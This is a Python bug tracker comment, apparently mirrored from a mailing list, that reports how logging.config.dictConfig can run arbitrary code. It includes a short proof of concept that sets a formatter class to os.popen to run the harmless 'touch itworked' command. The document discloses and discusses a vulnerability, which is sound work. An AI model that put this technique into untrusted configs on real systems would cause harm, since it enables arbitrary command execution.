[issue46251] logger.config.configure_formatter executes arbitrary code

Eric V. Smith Mon, 03 Jan 2022 14:45:54 -0800


Eric V. Smith <e...@trueblade.com> added the comment:


Actually, the last line isn't necessary.

------------
import logging.config
import json

log_config_txt = '''{
    "version":1,
    "formatters":{
        "EXPLOIT":{
            "class": "os.popen",
            "format": "touch itworked",
            "datefmt": "r",
            "style": 1
        }
    }
}
'''

log_config = json.loads(log_config_txt)
logging.config.dictConfig(log_config)
------------

I suspect the answer to this will be: "don't load untrusted configuration 
files". But I'll see what others have to say. There should probably be a 
warning about it somewhere. I didn't see anything.

----------

_______________________________________
Python tracker <rep...@bugs.python.org>
<https://bugs.python.org/issue46251>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com

[issue46251] logger.config.configure_formatter executes arbitrary code

Reply via email to